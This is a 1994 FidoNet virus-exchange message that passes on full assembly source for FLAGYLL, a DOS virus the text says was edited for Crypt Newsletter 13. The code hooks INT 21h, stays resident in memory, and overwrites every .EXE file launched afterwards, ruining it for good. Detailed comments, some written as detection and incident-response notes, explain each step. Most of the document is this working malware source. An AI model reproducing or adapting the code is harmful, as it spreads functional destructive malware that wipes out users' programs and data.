;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 36 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : FLAGYLL.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: Информация о вирусах)
;* From : Gilbert Holleman, 2:283/718 (06 Nov 94 17:38)
;* To : Bill Dirks
;* Subj : FLAGYLL.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Gilbert.Holleman@f718.n283.z2.fidonet.org
;FLAGYLL virus - edited for Crypt Newsletter 13
;FLAGYLL is a memory resident, overwriting virus which
;infects and destroys .EXE files on load.
;It updates the infected files time/date stamps to the time of
;infection so it can easily be followed.
;.EXE's infected by FLAGYLL are destroyed. DOS will either
;refuse to load them or FLAGYLL will become resident
;as they execute. These programs are ruined and can only
;be deleted. Because it is so destructive to files, FLAGYLL cannot
;pose a threat in the wild, and in this respect, it is much
;inferior to the SUSAN virus included in this issue.
.radix 16 ; default numeric base is hex: bare 100, 40, 5a below mean 100h, 40h, 5Ah
cseg segment
model small
assume cs:cseg, ds:cseg, es:cseg
org 100h ; .COM-style image: the body is assembled at offset 100h
; Scratch slots placed right after the body. They exist only in the resident
; copy; filelength stops at endflagyll, so they are never written to a host.
oi21 equ endflagyll ; dword: saved original INT 21h vector (filled in hook_21, used in check_exec)
filelength equ endflagyll - begin ; byte size of the body = amount written over a host (do_exe)
nameptr equ endflagyll+4 ; dword far pointer to the EXEC filename (set in over_id, read by host_ident)
DTA equ endflagyll+8 ; private DTA installed while a host is examined (infect)
begin: jmp install_flagyll ; entry point: go resident, then fall out through cancel
;-----------------------------------------------------------------------
; install_flagyll - go resident
; Runs once from the entry point (begin). Effects, in order:
;   1. shrinks this program's own memory block (must be the last MCB,
;      type 'Z') by 100h paragraphs (4 KiB; numbers are hex, see .radix),
;   2. copies the body (filelength bytes) to offset 100h of the freed area,
;   3. saves the current INT 21h vector (IVT 0:0084h) into the copy at
;      oi21 and points INT 21h at check_exec inside the copy,
;   unless the vector's offset already equals check_exec, in which case
;   it exits without hooking.
; Detection/IR note: the resident copy lives immediately above the
; shrunk last MCB, and the INT 21h vector at 0:0084h points into it.
; Register roles: ds = MCB, then PSP, then IVT; es = resident segment;
; cx = body length, left at 0 by the copy and reused as the IVT segment.
;-----------------------------------------------------------------------
install_flagyll:
mov ax,cs ; ds = this program's MCB (one paragraph below the PSP = cs)
dec ax
mov ds,ax
cmp byte ptr ds:[0000],5a ; MCB type byte must be 'Z' (5Ah): last block in the chain
jne cancel ; otherwise do nothing
mov ax,ds:[0003] ; MCB+3 = block size in paragraphs
sub ax,100 ; take 100h paragraphs (4 KiB) off the top of the block
mov ds:0003,ax
copy_flagyll:
mov bx,ax ; bx = new block size
mov ax,es ; es = PSP segment
add ax,bx ; PSP + new size = first paragraph past the shrunk block
mov es,ax ; es = destination (resident) segment
mov cx,offset endflagyll - begin ; cx = length of the body (filelength)
mov ax,ds ; ds = MCB segment + 1 = PSP = cs
inc ax
mov ds,ax
lea si,ds:[begin] ; ds:si = body in the running image
lea di,es:0100 ; es:di = same offset (100h) in the resident segment
rep movsb ; copy the body; leaves cx = 0
hook_21:
mov ds,cx ; ds = 0: interrupt vector table
mov si,0084h ; 0:0084h = vector slot for INT 21h (21h * 4)
mov di,offset oi21 ; es:di = save slot inside the resident copy
mov dx,offset check_exec ; dx = offset of the resident handler
lodsw ; ax = offset half of the current INT 21h vector
cmp ax,dx ; already pointing at check_exec?
je cancel ; yes: already resident, do not hook again
stosw ; save the old offset at oi21
movsw ; save the old segment at oi21+2
push es
pop ds ; ds = resident segment
mov ax,2521h ; DOS set interrupt vector: INT 21h := ds:dx (resident check_exec)
int 21h
cancel: ret ; return to PSP:0000; by the .COM convention that terminates the program
;-----------------------------------------------------------------------
; check_exec - resident INT 21h handler (installed by hook_21)
; Every INT 21h call lands here. Saves flags and es/ds/ax/bx/dx, calls
; infect only when AX = 4B00h (DOS EXEC: load and execute; ds:dx =
; filename), restores those registers and chains to the original
; handler through the saved vector at cs:[oi21].
; cx, si and di are not saved although infect uses them, so an EXEC
; caller sees them clobbered.
; infect may not return at all: after a successful overwrite it ends in
; a 4C00h terminate (see do_exe), and the state pushed here is abandoned.
;-----------------------------------------------------------------------
check_exec: ; look over loaded files
pushf ; for executables
push es ; save what infect changes (cx/si/di are not covered)
push ds
push ax
push bx
push dx
cmp ax,04B00h ; is a file being
; executed ?
jne abort ; no, exit
do_infect:
call infect ; then try to infect
abort: ; restore everything
pop dx
pop bx
pop ax
pop ds
pop es
popf
exit:
; chain to the original INT 21h handler: far jmp through the saved vector
jmp dword ptr cs:[oi21]
;-----------------------------------------------------------------------
; infect - called from check_exec with ds:dx = filename about to be EXECed
; Flow:
;   - records the filename pointer twice (name_seg/name_off and nameptr
;     receive the same ds:dx),
;   - swaps the DTA for a private one at cs:DTA, keeping the old one on
;     the stack,
;   - host_ident locates the 3-character extension; a 'COM' extension is
;     skipped, anything other than 'EXE' is skipped,
;   - do_exe clears the read-only attribute, opens the file read/write,
;     seeks to offset 0 and writes filelength bytes of this body (from
;     cs:100h) over the start of the host, closes it and terminates the
;     current process with AH=4Ch. That path never returns to check_exec
;     and does not restore the caller's DTA.
;   - return (skip path) restores the DTA and returns to check_exec.
; Every int 21h issued here re-enters check_exec first (the vector is
; hooked); none of them is 4B00h, so they are passed straight through.
; IR note: an infected .EXE has its first filelength bytes replaced by
; this body (including the strings at note and note2); the original
; bytes are not preserved anywhere, so the file can only be restored
; from a clean copy.
; Clobbers: ax, bx, cx, dx, si, di, ds, es, flags.
;-----------------------------------------------------------------------
infect:
jmp over_id ; skip over the embedded text
note: db '-=[Crypt Newsletter 13]=-'
over_id:
mov cs:[name_seg],ds ; ds:dx = filename passed to EXEC
mov cs:[name_off],dx
cld ; forward direction for the string ops below
mov word ptr cs:[nameptr],dx ; second copy of the same pointer, read by host_ident
mov word ptr cs:[nameptr+2],ds
mov ah,2Fh ; DOS get DTA -> es:bx
int 21h
push es ; keep the caller's DTA for the return path
push bx
push cs ; set new DTA: ds:dx = cs:DTA
pop ds
mov dx,offset DTA
mov ah,1Ah
int 21h
call host_ident ; es:di = the extension characters of the filename
push di
mov si,offset COM_txt ; ds:si = 'COM' (ds = cs here)
mov cx,3
rep cmpsb ; ZF = 1 if the extension is 'COM'
pop di ; es:di back to the extension
jz return ; 'COM' hosts are left alone
mov si,offset EXE_txt ; now compare against 'EXE'
nop
mov cl,3 ; ch is already 0 (cx never exceeded 3 in the previous compare)
rep cmpsb
jnz return ; not 'EXE': left alone
do_exe: ; overwrite the .EXE host with the body
mov ax,4300h ; DOS get file attributes -> cx, ds:dx = filename
mov ds,cs:[name_seg]
mov dx,cs:[name_off]
int 21h
and cl,0FEh ; clear the read-only bit so the open below succeeds
mov ax,4301h ; DOS set file attributes
int 21h
mov ds,cs:[name_seg] ; open the host read/write
mov dx,cs:[name_off]
mov ax,3D02h ; DOS open, access mode 2 (read/write) -> ax = handle
int 21h
jc close_file ; open failed: control still falls through close_file to the 4C00h terminate
push cs
pop ds
mov [handle],ax ; cs:[handle] = host handle
mov bx,ax
push cs
pop ds
mov ax,4200h ; DOS lseek, origin 0 (start of file)
push cs
pop ds
mov bx,[handle] ;handle to BX
xor cx,cx ; cx:dx = offset 0
xor dx,dx
int 21h
mov ah,40 ; DOS write (radix 16: 40h), bx = handle
mov cx,filelength ; byte count = size of the body
mov dx,100 ; ds:dx = cs:100h = start of the body
int 21h ; the host's first filelength bytes now hold this code
close_file: mov bx,[handle]
mov ah,03Eh ; DOS close handle
int 21h
mov ax,4C00h ; DOS terminate process (exit code 0): the program that issued
int 21h ; the EXEC ends here; check_exec is never resumed on this path
return: mov ah,1Ah ; DOS set DTA back to the caller's es:bx saved above
pop dx ; restore old DTA
pop ds
int 21H
ret ; back to check_exec, which chains to the original handler
;-----------------------------------------------------------------------
; host_ident - point es:di at the filename extension
; In:  cs:[nameptr] = far pointer to the ASCIIZ filename (set in over_id)
; Out: es:di = 4 bytes back from the position just past the terminating
;      NUL, i.e. the 3 extension characters when the name ends in ".XXX"
;      (assumed, not checked); al = 0; cx and flags clobbered
; Only ch is set to 0FFh; cl keeps whatever the caller left in it, so the
; scan limit is at least 0FF00h bytes.
;-----------------------------------------------------------------------
host_ident: les di,dword ptr cs:[nameptr] ; es:di = filename
mov ch,0FFh ; large scan count (cl is not set)
mov al,0 ; byte to find: the NUL terminator
repnz scasb ; di stops one byte past the NUL
sub di,4 ; back up over the NUL and the 3 extension characters
ret
; Data area. Everything up to endflagyll is part of the body written over
; a host, so these strings are present in every infected file.
EXE_txt db 'EXE',0 ; extension compared in infect; such hosts are overwritten
COM_txt db 'COM',0 ; extension compared in infect; such hosts are skipped
name_seg dw ? ; segment of the EXEC filename (set in over_id)
name_off dw ? ; offset of the EXEC filename (set in over_id)
handle dw ? ; handle of the opened host (do_exe / close_file)
note2: db 'Flagyll' ; virus name string
endflagyll: ; end of body; the oi21/nameptr/DTA scratch slots follow in the resident copy
cseg ends
end begin
;-+- GEcho 1.10+
; + Origin: Poeldijk, The Netherlands, Europe, Earth (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/3 Enable 32-bit processing
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)